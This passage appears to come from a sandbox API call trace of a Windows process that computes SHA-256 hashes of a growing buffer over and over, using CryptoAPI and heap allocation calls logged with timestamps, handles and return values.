	[0102.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246388
	[0102.092] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246388, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246388, pdwDataLen=0x12941c) returned 1
	[0102.092] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.092] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.092] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.092] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.092] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0102.092] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2463b0
	[0102.092] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2463b0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2463b0, pdwDataLen=0x12941c) returned 1
	[0102.092] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.092] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.092] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.093] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.093] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0102.093] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2463d8
	[0102.093] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2463d8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2463d8, pdwDataLen=0x12941c) returned 1
	[0102.093] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.093] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.093] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.093] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.093] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0102.093] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246400
	[0102.093] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246400, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246400, pdwDataLen=0x12941c) returned 1
	[0102.093] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.093] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.093] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.094] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.094] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0102.094] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246428
	[0102.094] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246428, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246428, pdwDataLen=0x12941c) returned 1
	[0102.094] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.094] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.094] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.094] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.094] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0102.094] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246450
	[0102.094] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246450, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246450, pdwDataLen=0x12941c) returned 1
	[0102.094] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.094] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.094] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.095] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.095] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0102.095] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246478
	[0102.095] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246478, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246478, pdwDataLen=0x12941c) returned 1
	[0102.095] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.095] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.095] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.095] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.095] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0102.095] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2464a0
	[0102.095] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2464a0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2464a0, pdwDataLen=0x12941c) returned 1
	[0102.095] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.095] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.095] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.096] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.096] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0102.096] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2464c8
	[0102.096] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2464c8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2464c8, pdwDataLen=0x12941c) returned 1
	[0102.096] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.096] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.096] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.096] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.096] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0102.096] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2464f0
	[0102.096] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2464f0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2464f0, pdwDataLen=0x12941c) returned 1
	[0102.096] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.096] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.096] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.097] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.097] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0102.097] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246518
	[0102.097] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246518, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246518, pdwDataLen=0x12941c) returned 1
	[0102.097] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.097] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.097] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.097] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.097] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0102.097] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246540
	[0102.097] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246540, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246540, pdwDataLen=0x12941c) returned 1
	[0102.097] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.097] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.098] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.098] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.098] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0102.098] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246568
	[0102.098] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246568, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246568, pdwDataLen=0x12941c) returned 1
	[0102.098] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.098] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.098] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.098] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.098] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0102.098] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246590
	[0102.098] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246590, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246590, pdwDataLen=0x12941c) returned 1
	[0102.098] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.098] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.098] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.099] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.099] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0102.099] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2465b8
	[0102.099] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2465b8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2465b8, pdwDataLen=0x12941c) returned 1
	[0102.099] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.099] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.099] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.099] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.099] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0102.099] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2465e0
	[0102.099] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2465e0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2465e0, pdwDataLen=0x12941c) returned 1
	[0102.099] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.099] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.100] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.100] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.100] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0102.100] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246608
	[0102.100] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246608, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246608, pdwDataLen=0x12941c) returned 1
	[0102.100] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.100] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.100] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.100] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.100] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0102.100] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246630
	[0102.100] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246630, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246630, pdwDataLen=0x12941c) returned 1
	[0102.100] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.100] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.101] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.101] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.101] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0102.101] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246658
	[0102.101] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246658, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246658, pdwDataLen=0x12941c) returned 1
	[0102.101] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.101] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.101] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.101] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.101] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0102.101] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246680
	[0102.101] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246680, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246680, pdwDataLen=0x12941c) returned 1
	[0102.101] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.102] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.102] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.102] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.102] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0102.102] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2466a8
	[0102.102] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2466a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2466a8, pdwDataLen=0x12941c) returned 1
	[0102.102] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.102] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.102] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.102] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.103] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0102.103] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2466d0
	[0102.103] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2466d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2466d0, pdwDataLen=0x12941c) returned 1
	[0102.103] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.103] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.103] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.103] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.103] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0102.103] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2466f8
	[0102.103] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2466f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2466f8, pdwDataLen=0x12941c) returned 1
	[0102.103] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.103] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.103] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.104] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.104] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0102.104] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246720
	[0102.104] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246720, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246720, pdwDataLen=0x12941c) returned 1
	[0102.104] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.104] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.104] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.104] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.104] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0102.104] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246748
	[0102.104] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246748, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246748, pdwDataLen=0x12941c) returned 1
	[0102.104] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.104] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.104] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.105] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.105] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0102.105] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246770
	[0102.105] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246770, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246770, pdwDataLen=0x12941c) returned 1
	[0102.105] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.105] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.105] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.105] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.105] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0102.105] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246798
